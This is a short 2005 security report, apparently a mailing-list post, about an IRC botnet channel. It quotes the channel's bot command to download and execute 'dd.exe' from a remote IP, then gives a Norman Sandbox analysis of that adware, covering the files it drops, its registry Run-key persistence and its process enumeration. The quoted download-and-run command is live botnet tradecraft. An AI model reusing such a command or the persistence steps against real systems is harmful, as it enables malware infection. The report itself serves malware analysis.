And in the channel, ##test the topic contained an link for the bots (?download
http://67.159.26.109/~tehcia/dd.exe C:\dd.exe 1 -s),
Norman Scanner Engine 5.82. 1
Sandbox 05.82, dated 27/04-2005
Your message ID (for later reference): 20050531-011
dd.exe : Not detected by sandbox (Signature: W32/WinAd.AJ)
[ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO -
REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* Accesses executable file from resource section.
* Creating several executable files on hard-drive.
* File length: 163961 bytes.
[ Changes to filesystem ]
* Creates directory C:\Program Files\Media Access.
* Creates file C:\Program Files\Media Access\MediaAccC.dll.
* Creates file C:\Program Files\Media Access\MediaAccK.exe.
* Creates file C:\Program Files\Media Access\Info.txt.
* Creates file C:\WINDOWS\SYSTEM\ide21201.vxd.
[ Changes to registry ]
* Creates key "HKLM\Software\Media Access".
* Sets value
"param"=& quot;3baf8b1054d0015e8a49b821df2fa3ffe78a3b7aa704cbe1:31303138346238306266626631
66616331356164666535613064363264373962:other::win98:exe"
in key "HKLM\Software\Media Access".
* Sets value "track"="1" in key "HKLM\Software\Media Access".
* Deletes value "Updating" in key "HKLM\Software\Media Access".
* Creates value "Media Access"="C:\ProgramFiles\MediaAccess\MediaAccK.exe"
in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
[ Process/window information ]
* Attemps to NULL C:\Program Files\Media Access\MediaAccess.exe NULL.
* Creates a mutex MediaAccess.
* Will automatically restart after boot (I'll be back...).
* Creates an event called Registry event.
* Enumerates running processes.
* Enumerates running processes several parses....
© 2004 Norman ASA. All Rights Reserved.
The material presented is distributed by Norman ASA as an information source
only.